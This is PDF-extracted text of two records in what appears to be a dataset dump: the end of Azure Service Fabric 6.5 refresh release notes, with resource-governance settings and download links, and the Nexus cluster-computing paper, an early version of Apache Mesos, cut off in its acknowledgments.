................................ ................................ ................. 6 \nRepositories and Download Links ................................ ................................ ................................ ................................ ................................ ................ 11 \nVisual Studio 2015 Tool for Service Fabric – localized download links ................................ ................................ ................................ ................. 14 \n Breaking announcements \n• Protecting system entities from runaway 'user' code : From 6.5 version onwards , users can set up resource protection between the \nsystem and user services on a node. Service Fabric will enforce these hard resource limits for user services to guarantee that all the non -\nsystem services on a node will never use more than the specified amount of resources. Please refer to this section for configuration \ndetails . Upgrade requirements for Docker Compose customers \nFor any customers running a Docker Compose application on their cluster. Please follow the guidance given below \nfor each scenario, \n• Cluster had been upgrade d to version 6.5.435.1 for Ubuntu or version 6.5.639.9590 for Windows and experiencing cluster availability issues : Please \nreach out to us through Azure Portal Help for assistance with this issue. Here are your general support options for Service Fabric: \nhttps://docs.microsoft.com/azu re/service -fabric/service -fabric -support . \n \n• Cluster had been upgraded to version 6.5.435.1 for Ubuntu or version 6.5.639.9590 for Windows and are not experiencing any issues : Need to \nupgrade the cluster to this 6.5 refresh release version as soon as possible. \n \n• Cluster had not been upgraded to version 6.5.435.1 for Ubuntu or version 6.5.639.9590 for Windows : Need to first upgrade the cluster to the latest \nversion of 6.4. This would be version 6.4.664.9590 + for Windows and 6.4.661.1 + for Ubuntu. Once you have upgraded to this version, you can safely \nupgrade to this 6.5 refresh release versio n. \n Service Fabric Common Bug Fixes \nVersions IssueType Description Resolution \nUbuntu 6.5.454.1 Bug When creating \ncompose \napplication, one \nmore \"fabric:/\" is \nadded to the \napplication instance \nname. This name is \nused to generate log \ndriver in Linux. The \nwrong name with \ntwo \"fabric:/\" prefix \nused by log driver \ncauses compose \napplication creation \nto fail . Impact : Compose application in Linux cannot be created. \nFix: Remove the additional “fabric:/\" when creating compose application instance. \n \nUbuntu 6.5.454.1 \nWindows \n6.5.641.9590 \n Bug Compose \napplications are \nmigrated to use new \nworkflow in Cluster \nManager in 6.5. If \ncompose \napplications are \nupgraded before , \nCluster Manager \nwill crash when \ncluster is upgrading \nto 6.5. Impact : If compose applications are upgraded before, then Cluster Manager will crash if cluster \nis upgrading to 6.5. \nFix: The issue is if compose application is upgraded before, it will reset its upgrade description to \nnull. When migrating, the description is used to creating new data for compose application , and \nnull causes migration failed . Fix to check null upgrade description before migration. \nUbuntu 6.5.454.1 \nWindows \n6.5.641.9590 \n Bug Version 6.5 of \nService Fabric \nintroduced a \nregression in \ncalculating \nplacement \nconstraints . Impact : In cases when the placement constraint for a service contains operator “==” and has a \nproperty value starting with the letter P, the placement property expression will not be calculated \ncorrectly and will be ignored. \n Fix: This refresh release fixes this problem and removes the regression. Ubuntu 6.5.454.1 \nWindows \n6.5.641.9590 \n Bug Protecting system \nentities from \nrunaway 'user' \ncode Few customers encountered problems due to runaway user services consuming all the resources \non Service Fabric nodes. The resource exhaustion (spinning CPU, memory exhaustion, \nhammering disk IO, disk space exhaustion) resulted in several bad effects including starving other \nservices on the nodes, nodes ending up in a bad state, complex mitigation and recovery steps, and \nunresponsive cluster management APIs. \n \nWith this version of Service Fabric, you can now set up resource protection between the system \nand user services on a node. Service Fabric will enforce these hard resource limits \nfor user services to guarantee that all the non -system services on a node will never use more than \nthe specified amount of resources. \n \nThis release adds an additional configuration option: EnforceUserServiceMetricCapacities. This \nconfig is in the PlacementAndLoadBalancing section of your ClusterManifest/ClusterConfig, and \nis OFF by default (to prevent unexpected surprises fo r existing customers during upgrades). \n \n<Section Name =\"PlacementAndLoadBalancing\" > \n<Parameter Name =\"EnforceUserServiceMetricCapacities\" Value =\"true\" /> \n</Section> \n \n{ \n\"name\" : \"PlacementAndLoadBalancing\" , \n \"parameters\" : [ { \n\"name\" : \"EnforceUserServiceMetricCapacities\" , \n\"value\" : \"true\" } ] \n} \n \nThis feature depends on Node Capacities for the Service Fabric resource governed \nhttps://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -resource -governance metrics \n(as of this writing Memory and CPU Cores) being set. These capacities can be set either \nautomatically ( AutoDetectAvailableResources flag is false) or manually. If no capacities are set, \nthe node is considered to have infinite capacity for the given metric, and hence this feature cannot \nbe used (since SF doesn't know how much resources to reserve for system services). \nSF will issue a health warning if \"EnforceUserServiceMetricCapacities\" is true but capacities are \nnot specified. \n \nThe specified metric capacity for the node is then divided between the user services defines and \nthe rest of the system. The amount dedicated to the user serv ices vs. the amount dedicated to the \nsystem is controlled by the following settings: <Section Name =\"PlacementAndLoadBalancing\" > \n<!-- 0.0 means 0%, and 1.0 means 100% --> \n<Parameter Name =\"CpuPercentageNodeCapacity\" Value =\"0.8\" /> \n<Parameter Name =\"Memo ryPercentageNodeCapacity\" Value =\"0.8\" /> \n</Section> \n \nThese ratios are defined by default. By default 80% of node capacity is used for user \nservices and 20% will be left to allow enough resources for the SF system \nservices (and also for any other processes/apps running on the node that are not visible to SF). \nThese settings are static and upgrades to change them will require node restarts. User service \ncapacity is enforced only for governed SF metrics (Memory and CP U Cores as of this writing). \nFor non -governed metrics, it's treated as a soft guarantee (violations are possible, but if they \nhappen, load balancer will trigger and attempt to fix the violation by moving services around, just \nlike normal capacity violation s). The SF system services are effectively ungoverned , and they \ncan go beyond of their quota. Effectively constraining the system components and preventing \nthem from growing beyond their allotment will be handled in an upcoming release. \n \n \nWith this change, user services metric capacity can also be defined per Node Type. T At the \nNodeType level, a new section is added named UserServicesMetricCapacity. Within this section, \nthe same setting names and behavior can be defined and will result in the same behavior as \ndescribed for the Cluster Manifest level settings. If metric capacity is defined in both places, node \ntype definition takes precedence. \n<NodeTypes> \n<NodeType Name =\"NodeType0\"> \n<UserServicesMetricCapacity> \n<Parameter Name =\"CpuPercentageNodeCapacity\" Value =\"0.5\"/> \n<Parameter Name =\"MemoryPercentageNodeCapacity\" Value =\"0.7\"/> \n</UserServicesMetricCapacity> \n</NodeType> \n</NodeTypes> \nThis release also fixes an issue in the calculation of node capacities. The rule for calcu lating \ncapacity has changed to account for percentage value ( User Services Capacity = \nNode Capacity * User Services Capacity Percentage ) \n \nPreviously, if user provided an override value for node capacity in NodeType, the % value was \nignored. This could be surprising to some users. \n Scenario 1 Scenario 2 Scenario 3 Scenario 4 \nNode \ncapacity \nauto-\ndetected \nvalue 100 100 100 100 \nNode \ncapacity \nuser \noverride - 90 - 90 \nUser \nservices \ncapacity \ndefault in \ncluster \nmanifest 0.7 0.7 0.7 0.7 \nUser \nservices \ncapacity \ndefault in \nNode Type - - 0.5 0.5 \nUser \nservices \ncapacity - \nactual value 70 90 50 90 \n \nWith this release, if user provides an override for the absolute capacity in NodeType, the % value \nis NOT ignored, and will further discount the av ailable resources on the node. \n \n Scenario 1 Scenario 2 Scenario 3 Scenario 4 \n \n \n Node \ncapacity \nauto-\ndetected \nvalue \n 100 100 100 100 \nNode \ncapacity \nuser \noverride \n - 90 - 90 \nUser \nservices \ncapacity \ndefault in \ncluster \nmanifest \n 0.7 0.7 0.7 0.7 \nUser \nservices \ncapacity \ndefault in \nNode Type \n - - 0.5 0.5 \nUser \nservices \ncapacity - \nactual value \n 70 63 50 45 \n Repositories and Download Links \nThe table below is an overview of the direct links to the packages associated with this release. \nFollow this guidance for setting up your developer environment: \n• Linux: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started -linux \n• Mac: https://docs.microsoft.com/en -us/azure/service -fabric/servic e-fabric -get-started -mac \n• Windows: https://docs.microsoft.com/en -us/azure/service -fabric/service -fabric -get-started \nArea Package Versio\nn Repository Direct Download Link \nServic\ne \nFabri\nc \nRunti\nme Ubuntu Developer Set -up 6.5.45\n4.1 N/A Cluster Runtime: \nhttps://apt -\nmo.trafficmanager.net/repos/servicefabric/pool/main/s\n/servicefabric \nService Fabric SDK for local cluster setup: \nhttps://apt -\nmo.trafficmanager.net/repos/servicefabric/pool/main/s\n/servicefabricsdkcommon / \nContainer image: \nhttps://hub.docker.com/r/microsoft/service -fabric -\nonebox/ \n Red Hat Developer Set -up 6.1.18\n9.1 N/A Cluster Runtime: \nhttps://packages.microsoft.com/yumrepos/microsoft -\nrhel7.4 -prod/ \nService Fabric SDK for local cluster setup: \nhttps://packages.microsoft.com/yumrepos/microsoft -\nrhel7.4 -prod/servicefabric_sdkcommon_1.1.2.rpm \n \n Windows Developer Set -up 6.4.64\n1.9590 N/A https://download.microsoft.com/download/9/2/0/920B\n15E6 -8CC1 -4413 -8978 -\n123B77288B40/MicrosoftServiceFabric.6.5.641.95 90.\nexe \nServic\ne \nFabri\nc for \nWind\nows \nServe\nr Service Fabric Standalone \nInstaller Package 6.4.64\n1.9590 \n N/A https://download.microsoft.com/download/8/3/6/836E\n3E99 -A300 -4714 -8278 -\n96BC3E8B5528 /6.5.641.9590/Microsoft.Azure.Servic\neFabric.WindowsServer.6.5.641.9590.zip \nService Fabric Standalone \nRuntime 6.4.64\n1.9590 N/A https://download.microsoft.com/download/B/0/B/B0B\nCCAC5 -65AA -4BE3 -AB13 -\nD5FF5890F4B5/6.5.641.9590/Mi crosoftAzureService\nFabric.6.5.641.9590.cab \n.NET \nSDK Windows .NET SDK 3.4.64\n1 N/A https://download.microsoft.com/download/9/2/0/920B\n15E6 -8CC1 -4413 -8978 -\n123B77288B40/MicrosoftServiceFabricSDK.3.4.641.\nmsi \nMicrosoft.ServiceFabric 6.4.64\n1 N/A https://www.nuget.org \nReliable Services and \nReliable Actors \n• Microsoft.ServiceFab\nric.Services \n• Microsoft.ServiceFab\nric.Services.Remoting 3.4.64\n1 https://github.com/Azure/service -\nfabric -services -and-actors -dotnet https://www.nuget.org • Microsoft.ServiceFab\nric.Services.Wcf \n• Microsoft.ServiceFab\nric.Actors \nMicrosoft.ServiceFabric.Acto\nrs.Wcf \nASP.NET Core Service \nFabric integration \nMicrosoft.ServiceFabric.Servi\nces.AspNetCore.* 3.4.64\n1 https://github.com/Azure/service -\nfabric -aspnetcore https://www.nuget.org \n.NET \nSDK Data, Diagnostics and Fabric \ntransport \n• Microsoft.ServiceFab\nric.Data \n• Microsoft.ServiceFab\nric.Data.Interfaces \n• Microsoft.ServiceFab\nric.Diagnostics.Intern\nal \nMicrosoft.ServiceFabric.Fabri\ncTransport.Internal 3.4.64\n1 N/A https://www.nuget.org \n.NET \nSDK Microsoft.ServiceFabric.Data.\nExtensions 1.4.64\n1 N/A https://www.nuget.org \n \nJava \nSDK Java SDK 1.0.5 N/A https://mvnrepository.com/artifact/com.microsoft.servi\ncefabric/sf -actors/1.0.0 \nVisual \nStudi\no Visual Studio 2017 Tools for \nService Fabric 2.5.20\n608.1 N/A Included in Visual Studio 2017 Update 7 (15.7) and \nabove \nVisual Studio 2015 Tools for \nService Fabric 2.5.20\n615.1 N/A See localized download links below \nEclips\ne Service Fabric plug -in for \nEclipse 2.0.7 N/A N/A \nYeom\nan Azure Service Fabric Java \ngenerator 1.0.7 https://github.com/Azure/generato\nr-azuresfjava N/A \nVisual Studio 2015 Tool for Service Fabric – localized download links \nNOTE: The below download links are for the 2.5.20615.1 release of Visual Studio 2015 Tools for Service Fabric. \nhttps://download.microsoft.com/download/9/2/0/92 0B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.de -de.msi \nhttps://download.micr osoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.en -us.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.es -es.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.fr -fr.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.it -it.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.ja -jp.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.ko -kr.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools .VS140.ru -ru.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFabricTools.VS140.zh -cn.msi \nhttps://download.microsoft.com/download/9/2/0/920B15E6 -8CC1 -4413 -8978 -123B77288B40/MicrosoftAzureServiceFab ricTools.VS140.zh -tw.msi Azure Service Fabric C# \ngenerator 1.0.9 https://github.com/Azure/generato\nr-azuresfcsharp N/A \nAzure Service Fabric guest \nexecutables generator 1.0.1 https://github.com/Azure/generato\nr-azuresfguest N/A \nAzure Service Fabric \nContainer generators 1.0.1 https://github.com/Azure /generato\nr-azuresfcontainer N/A \nCLI Service Fabric CLI 8.0.0 https://github.com/Azure/service -\nfabric -cli https://pypi.python.org/pypi/sfctl \nPower\nShell AzureRM.ServiceFabric 0.3.15 https://github.com/Azure/azure -\npowershell/tree/preview/src/Resou\nrceManager/ServiceFabric https://www.powershellgallery.com/packages/AzureR\nM.ServiceFabric/0.3.15 " } ]
{ "category": "Orchestration & Management", "file_name": "hotcloud_nexus.pdf", "project_name": "Apache Mesos", "subcategory": "Scheduling & Orchestration" }
[ { "data": "A Common Substrate for Cluster Computing\nBenjamin Hindman, Andy Konwinski, Matei Zaharia, Ion Stoica\nUniversity of California, Berkeley\nfbenh,andyk,matei,istoica g@cs.berkeley.edu\nAbstract\nThe success of MapReduce has sparked many e\u000borts\nto design cluster computing frameworks. We argue\nthat no single framework will be optimal for all ap-\nplications, and that we should instead enable organi-\nzations to run multiple frameworks e\u000eciently in the\nsame cloud. Furthermore, to ease development of new\nframeworks, it is critical to identify common abstrac-\ntions and modularize their architectures. To achieve\nthese goals, we propose Nexus, a low-level substrate\nthat provides isolation and e\u000ecient resource sharing\nacross frameworks running on the same cluster, while\ngiving each framework freedom to implement its own\nprogramming model and fully control the execution\nof its jobs. Nexus fosters innovation in the cloud by\nletting organizations run new frameworks alongside\nexisting ones and by letting framework developers fo-\ncus on speci\fc applications rather than building one-\nsize-\fts-all frameworks.\n1 Introduction\nIt has become increasingly clear that di\u000berent\ncloud applications bene\ft from di\u000berent program-\nming models. MapReduce [8] is attractive for its\nsimplicity, but this simplicity makes it di\u000ecult to\nexpress some computations. This led to the devel-\nopment of higher-level, domain-speci\fc abstractions\nthat use MapReduce as an execution substrate, like\nSawzall [15] and Pig [14], and of more general pro-\ngramming models that provide their own execution\nsubstrate, like Dryad [12]. However, making a pro-\ngramming model too general increases complexity\n(Dryad is arguably more complex than MapReduce)\nand decreases the opportunity to optimize programs\nusing application-speci\fc knowledge. We have iden-\nti\fed several applications that are hard to express\ne\u000eciently even in Dryad. We believe that no single\ngeneral programming model for the cloud will exist.\nInstead, multiple cluster computing frameworks will\nemerge, providing various programming models with\ndi\u000berent tradeo\u000bs. In this context, it is critical to\nidentify abstractions and system constructs that fa-\ncilitate the development of such new frameworks.As new programming models and new frameworks\nemerge, they will need to share computing resources\nand data sets. For example, a company using\nHadoop [3] should not have to build a second cluster\nand copy data into it to run a Dryad job. Sharing re-\nsources between frameworks is di\u000ecult today because\nframeworks perform both job execution management\nand resource management. For example, Hadoop acts\nlike a \\cluster OS\" that allocates resources among\nusers in addition to running jobs. To enable diverse\nframeworks to coexist, Nexus decouples job execution\nmanagement from resource management by provid-\ning a simple resource management layer over which\nframeworks like Hadoop and Dryad can run. Nexus\nprovides a \\slot\" abstraction, in which frameworks\nmay run \\tasks\" that do arbitrary work. Along with a\nmechanism called \\slot o\u000bers\", the \fne granularity of\nslots lets Nexus achieve more e\u000ecient resource shar-\ning across frameworks than would be possible with\ntraditional coarse-grained cluster scheduling systems\nlike Torque [17]. Nexus is analogous to a \\cluster\nhypervisor\": it provides isolation and multiplexing\nwhile giving each framework a high level of control\nover its own execution.\nNexus is bene\fcial even to organizations that only\nwish to run Hadoop. Two concerns in Hadoop to-\nday are scalability and robustness of the master pro-\ncess. Because the master manages alljobs running in\nthe cluster (so it can perform resource allocation), it\nmust be highly robust, and must scale to hundreds of\njobs across thousands of nodes. Any scheduling logic\nthat goes into the master must be tested extensively,\nbecause a bug in the master will crash the whole clus-\nter. Consequently, companies like Yahoo! and Face-\nbook run 6-10 month old versions of Hadoop even\nthough new versions provide signi\fcant performance\nand functionality improvements. If these organiza-\ntions ran Hadoop on Nexus, they would be able to run\nseparate Hadoop masters for each job, mitigating the\nscaling and robustness problems. Furthermore, they\ncould even run a stable version of Hadoop for pro-\nduction jobs and a faster but less stable version for\nexperimental jobs simultaneously. The Nexus master\n1can be made robust and scalable more easily than\nthe Hadoop master because it is a smaller codebase,\nperforms simpler logic, and rarely needs to change.\nIn this way, Nexus resembles a microkernel architec-\nture: the component that must be the most reliable\n(the resource manager) is made as small as possible.\nThis paper is organized as follows. In Section 2 we\nshow examples of applications to which MapReduce\nand Dryad are not well suited. Section 3 describes the\nNexus architecture. Section 4 describes our current\nprototype. We survey related work in Section 5 and\npresent a discussion and future work in Section 6.\n2 Beyond MapReduce and Dryad\nAlthough MapReduce and Dryad support many ap-\nplications, these frameworks have limitations. We list\nfour examples of applications for which these frame-\nworks are not ideal. In all four cases, one could\nenvision extending MapReduce and Dryad to better\nsupport the listed application. However, this would\nrequire extensive engineering and testing to ensure\nthat the changes do not break existing applications,\nand would increase the complexity of these systems.\nNexus provides an alternative: a developer can build\na framework more suitable than MapReduce or Dryad\nfor her application, and this framework can share a\ncluster e\u000eciently with MapReduce and Dryad.\n1. Iterative Jobs: Many machine learning algo-\nrithms start with a random value for a parameter\nand repeatedly evaluate a function of this parame-\nter over a dataset to compute a direction in which\nto move the parameter. Each evaluation can be ex-\npressed as a MapReduce job. However, systems like\nHadoop launch new worker processes for each job,\nwhich must re-read the input data, because they do\nnot know that the jobs are related. In many applica-\ntions, the amount of data per node is small enough\nthat it would be more e\u000ecient to keep it in memory\nbetween iterations.\n2. Nested Parallelism: As parallel programming\nlibraries for clusters are developed, it becomes attrac-\ntive to compose them. For example, a machine learn-\ning job might want to call a parallel matrix multipli-\ncation library from each task. Neither MapReduce\nnor Dryad support clean nesting of data \rows: for\nexample, if a Dryad vertex launches a computation as\na second Dryad job, it has to stay running while the\nsecond job executes, consuming a node in the clus-\nter. Nested parallelism is expressed more naturally\nin other programming models, like Cilk [6].\n3. Irregular Parallelism: In applications like\ngraph search, the data \row graph is not known in ad-\nvance. For example, a branch-and-bound algorithm\nHadoop
Nexus
master
Hadoop
scheduler
Nexus
slave
App
1
\nHadoop
executor
task
Nexus
slave
Dryad
executor
task
Nexus
slave
Dryad
scheduler
App
2
Nexus
Hadoop
master
App
\ntask
Hadoop
slave
task
task
Hadoop
slave
task
task
Hadoop
slave
task
Dryad

executor
task
Hadoop
executor
task
Figure 1: Comparing the architectures of Nexus and\nHadoop. The shaded regions make up Nexus. Hadoop\ncan run on top of Nexus, alongside Dryad.\nmight wish to add objects to explore onto a \\work\nqueue\" and prioritize them based on how attractive\nthey look. Neither MapReduce nor Dryad allow this\nlevel of control over the execution order of tasks.\n4. Existing Parallel Applications: It would be\nuseful to run parallel applications like distcc [2] on\nthe same infrastructure as Hadoop. However, ex-\npressing these applications as maps and reduces is\nawkward. Nexus allows more natural wrapping of\nthese applications into tasks.\n3 Nexus Architecture\n3.1 Overview\nThe goal of Nexus is to provide isolation and e\u000ecient\nresource sharing across cluster computing frameworks\nrunning on the same cluster. To accomplish this,\nNexus provides abstractions of computing resources\nand an API to let frameworks access these resources.\nNexus exports two abstractions: tasks and slots. A\ntaskrepresents a unit of work, such as a map task in\nMapReduce. A slotrepresents a computing resource\nin which a framework may run a task, such as a core\nand some associated memory on a multicore machine.\nWe rely on standard OS facilities (e.g. setrlimit in\nLinux) to isolate slots. We are also considering using\nvirtual machines.\nNexus employs two-level scheduling. At the \frst\nlevel, Nexus allocates slots between frameworks us-\ning fair sharing. At the second level, each framework\nis responsible for dividing its work into tasks, select-\ning which tasks to run in each slot, and as we shall\nexplain, deciding which slots to use. This lets frame-\nworks perform application-speci\fc optimizations.\nFigure 1 shows the architecture of Nexus. Like\nHadoop, Nexus has a master process that controls\n2aslave daemon running on each node in the clus-\nter. Each framework that uses Nexus has a sched-\nuler process that registers with the master. Sched-\nulers launch tasks in their allocated slots by provid-\ningtask descriptors . These descriptors are passed\nto a framework-speci\fc executor process that Nexus\nlaunches on slave nodes. A framework assigned mul-\ntiple slots on the same node has one executor per\nslot. Executors are also reused for subsequent tasks\nrun in their slot. This amortizes initialization costs\nand lets executors cache data shared across tasks in\nmemory which is highly bene\fcial for jobs like the\niterative one described in Section 2. Finally, Nexus\npasses status updates about tasks to schedulers, in-\ncluding noti\fcation if a task fails or a node is lost.\nThe elements of Nexus { schedulers, executors and\ntasks { map closely to components of frameworks like\nHadoop and Dryad. Nexus factors these elements out\ninto a common layer.\nNexus purposely does not provide abstractions for\nstorage and communication. We concentrate only\non allocating computing resources (slots), and allow\ntasks to use whichever storage and communication li-\nbraries they wish. For example, we expect many sites\nto install Hadoop's HDFS distributed \fle system for\nstorage. We do, however, plan to build communica-\ntion and storage abstractions for framework develop-\ners to use on top of Nexus.\n3.2 Slot Assignment\nThe main challenge with Nexus's two-level schedul-\ning design is ensuring that frameworks are allocated\nslots they wish to run in. For example, a MapRe-\nduce framework needs to run maps on the nodes that\ncontain its input \fle to avoid reading data over the\nnetwork. Nexus addresses this issue through a mech-\nanism called slot o\u000bers . When a slot becomes free,\nNexus o\u000bers it to each framework in turn, in order of\nhow far each framework is below its fair share. Each\nframework may accept the slot and launch a task in\nit, or refuse the slot if, for example, it has no data\non that machine. Refusing a slot keeps the frame-\nwork below its fair share, ensuring that it is o\u000bered\nfuture slots before other frameworks. If the frame-\nwork has still not found a data-local slot after wait-\ning for some time, it can always accept a non-local\nslot. While it may seem counterintuitive that refus-\ning slots can be bene\fcial to frameworks, experience\nwith job scheduling in Hadoop [4] has shown that this\nsimple policy is enough to achieve 99% data locality1\nand high fairness in workloads with dozens of jobs.\nIn general, slot o\u000bers let frameworks use arbitrary\ncriteria for selecting slots without requiring Nexus\nto be aware of these criteria. For example, while aMapReduce job wishes to run on nodes that have its\ninput data, the iterative job in Section 2 might prefer\nto reuse its previous slots, to take advantage of data\nloaded into memory by its executors.\nA second concern is how to reassign slots when\nframeworks' demands change (e.g., a new framework\nregisters). In normal operation, Nexus simply reas-\nsigns slots to new frameworks as tasks from over-\nallocated frameworks \fnish. As long as tasks are\nshort, this is su\u000ecient to redistribute slots quickly.\nFor example, if the average task length is one minute\nin a 100-node cluster with 4 slots per node is, then\nthere will be about 6.7 tasks \fnishing per second. If\nwe need to reassign, say, 40 slots (10% of the clus-\nter), we only need to wait 6 seconds. To ensure that\nframeworks are not starved even when some tasks\nare long, Nexus can also reclaim a slot by killing the\ntask executing in it after a timeout. Nexus reclaims\nmost-recently launched tasks from each framework\n\frst, minimizing wasted work. Because frameworks\nrunning on large clusters need to tolerate losing tasks\ndue to hardware failures, reclamation does not impact\nthem signi\fcantly { it is as if they never received the\nslot. We are also considering mechanisms for letting\nframeworks choose which slots they prefer to lose.\n4 Implementation Status\nWe have implemented a prototype of Nexus in ap-\nproximately 2,000 lines of C and C++. By limit-\ning the scope of Nexus's concerns we were able to\nfocus on optimizing for performance and scalability;\nfor example, we used asynchronous I/O techniques\nfor network communication. A framework registers\nand unregisters with Nexus using the API presented\nin Table 1. Table 2 lists the callbacks that Nexus\nuses to communicate with a framework for task man-\nagement. Once registered, a framework receives slot\no\u000bers and task status updates from the Nexus mas-\nter via the schedule and status callbacks. The Nexus\nslave passes a task descriptor to an executor by in-\nvoking its execute callback. Preliminary evaluation\nshows that Nexus can schedule thousands of tasks per\nsecond, an order of magnitude more than Hadoop.\nWe have also implemented an iterative machine learn-\ning job (logistic regression) as described in Section\n2 against Nexus, and measured factor of 10 perfor-\nmance gains from executor reuse.\n5 Related Work\n5.1 Infrastructure as a Service\nCloud infrastructures such as Amazon EC2 [1] and\nEucalyptus [13] allow for sharing between users by al-\nlowing virtual machines in a shared cloud to be rented\nby the hour. In such an environment, it would be pos-\n3Function Description\nnexus register(scheduler, executor) Register framework's scheduler and executor with the Nexus master.\nnexus unregister() Terminate the current framework.\nTable 1: Nexus API.\nFunction Description\nschedule(slot id) Invoked when Nexus o\u000bers a slot to a framework.\nstatus() Invoked when Nexus conveys information about a scheduled task to a framework.\nexecute(task id, args...) Invoked in the slot the framework scheduled the task.\nTable 2: Nexus framework callbacks.\nsible for separate frameworks to run concurrently on\nthe same physical cluster by creating separate virtual\nclusters (i.e., EC2 allocations). However, VMs can\ntake minutes to start and sharing data between sepa-\nrate virtual clusters is di\u000ecult to accomplish and can\nresult in poor data locality. Nexus provides abstrac-\ntions (i.e., tasks and slots) that eradicate the need for\nmany applications to use heavyweight VMs. In addi-\ntion, Nexus allows frameworks to select where to run\ntasks via the slot o\u000ber mechanism, allowing multiple\nframeworks to share data while achieving good data\nlocality.\n5.2 Cluster Computing Frameworks\nMapReduce was originally described in [8].\nSawzall [15] and Pig [14] built richer program-\nming models, like relational operators, on top of\nMapReduce. However, running all jobs over MapRe-\nduce can be ine\u000ecient: for example, a Pig query that\nis broken into a series of MapReduce jobs cannot\npipeline data directly between them.\nDryad [12] addresses this problem by providing\na more general execution model: data \row DAGs.\nClustera [9] provides a similar execution model.\nThese frameworks are valuable because they supply\ncommon execution abstractions, like worker vertices\nand channels, to applications. However, the set of\nabstractions provided is still limited. For example,\nvertices in Dryad form a DAG, which makes it di\u000e-\ncult to write the iterative job in Section 2 where one\nwould like to send a parameter to a worker, have it\ncompute a function, and use this result to compute\na new parameter for the same worker. Rather than\ntrying to build an even more general set of abstrac-\ntions than Dryad, Nexus lets Dryad layer over it, but\nalso enables other frameworks to be written against\nits lower-level interface of tasks.\n5.3 Cluster Scheduling Systems\nNexus di\u000bers from previous cluster scheduling sys-\ntems in two aspects: its slot o\u000ber mechanism and the\n\fne-grained nature of slots.Of the frameworks listed in the previous section,\nonly Clustera [9] describes multi-user support. Clus-\ntera uses a heuristic incorporating user priorities,\ndata locality and starvation to match work to idle\nnodes. However, Clustera requires each job to ex-\nplicitly list its locality needs (e.g. by listing its input\n\fles), meaning that needs that cannot be listed in\nthis manner (e.g. reusing a node to reuse a worker\nprocess) cannot be taken into account. In contrast,\nNexus's slot o\u000ber mechanism lets jobs use whichever\nheuristics they desire to select a slot.\nBatch cluster schedulers like Torque [17] give each\njob a \fxed block of machines at once, rather than\nletting a job's allocation scale up and down in a \fne-\ngrained manner, and do not account for data local-\nity. Grid schedulers like Condor [18] support locality\nconstraints, though usually at the level of geographic\nsites. Condor uses a \\ClassAd\" mechanism match\nnode properties to job needs. As in Clustera, this\nmeans that job needs that cannot be expressed as\nClassAds cannot be accounted for. Nexus gives jobs\n\fner control over where they run through slot o\u000bers.\n6 Discussion and Future Work\nBy letting diverse cluster computing frameworks\ncoexist e\u000eciently, Nexus accelerates innovation in\nthe cloud and encourages development of special-\nized frameworks rather than one-size-\fts-all solu-\ntions. Nexus is strongly inspired by work on micro-\nkernels [5], exokernels [10] and hypervisors [11] in the\nOS community and by the success of the narrow-waist\nIP model [7] in computer networks. Like a microker-\nnel or hypervisor, Nexus is a stable, minimal core that\nprovides performance and fault isolation to frame-\nworks sharing a cluster. Like an exokernel, Nexus\naims to give frameworks as much control over their\nexecution as possible. Finally, like IP, Nexus encour-\nages diversity and innovation in cluster computing by\nproviding a \\narrow waist\" API which lets di\u000berent\nframeworks run over shared hardware.\nWe have already written some applications directly\nagainst Nexus, and are currently porting Hadoop to\n4run over it. However, to ease the development of new\nframeworks, we plan to build a stack of higher-level\nabstractions over Nexus for framework developers to\nuse. For example, if Nexus represents the IP of cluster\ncomputing, then a fault-tolerance library providing a\nconcept of \\reliable tasks\" might represent the TCP.\nOther reusable abstractions that we intend to build\nare a data \row DAG library similar to Dryad and a\ntask-queue library similar to Intel Threading Build-\ning Blocks [16] for frameworks that wish to employ\nnested or irregular parallelism.\nUsing Nexus, we intend to explore both how to pro-\nvide better programming models for existing cloud\napplications and how to enable other applications to\nbene\ft from cloud computing. Some of the new ap-\nplications we wish to explore include:\n1.Scienti\fc Computing: Many scienti\fc applica-\ntions are not communication-intensive and could\ntherefore run on commodity clusters, but scien-\ntists typically write such applications using li-\nbraries like MPI rather than MapReduce.\n2.Parallel Build/Test Tools: It would be bene\f-\ncial to run build tools like distcc and distributed\nunit testing tools on the same infrastructure as\nHadoop clusters to maximize utilization.\n3.Web Servers: It may even be possible to use\nNexus to share resources between batch comput-\ning frameworks and interactive web applications.\nWeb servers are stateless, so they can be started\nand stopped dynamically as \\tasks\" as long as\nload balancers are aware of this. This would let\nan organization use a portion of its cluster for web\nserving during the day and batch applications at\nnight, improving data center utilization.\nFinally, from an operational standpoint, Nexus al-\nlows an organization to use multiple cluster comput-\ning frameworks without having to allocate separate\nhardware to each one. For example, if a new im-\nplementation of MapReduce appears that is faster\nthan Hadoop on some workloads, an organization can\nswitch a portion of its jobs to it. If an organization\nwishes to run two isolated instances of Hadoop, or two\ndi\u000berent versions of Hadoop, it can do this as well.\nLastly, if a developer builds a specialized framework\noptimized for only one type of application, an orga-\nnization can run this framework alongside Hadoop.\n7 Acknowledgments\nWe would like to thank Randy Katz, Anthony Joseph,\nScott Shenker, Krste Asanovi\u0013 c, George Necula, and\nthe anonymous reviewers. This research was sup-\nported by California MICRO, California Discov-\nery, the Natural Sciences and Engineering ResearchCouncil of Canada, a National Science Foundation\nGraduate Research Fellowship2, and the Berkeley\nRAD Lab sponsors: Sun, Google, Microsoft, HP,\nCisco, NetApp, VMWare, Amazon and 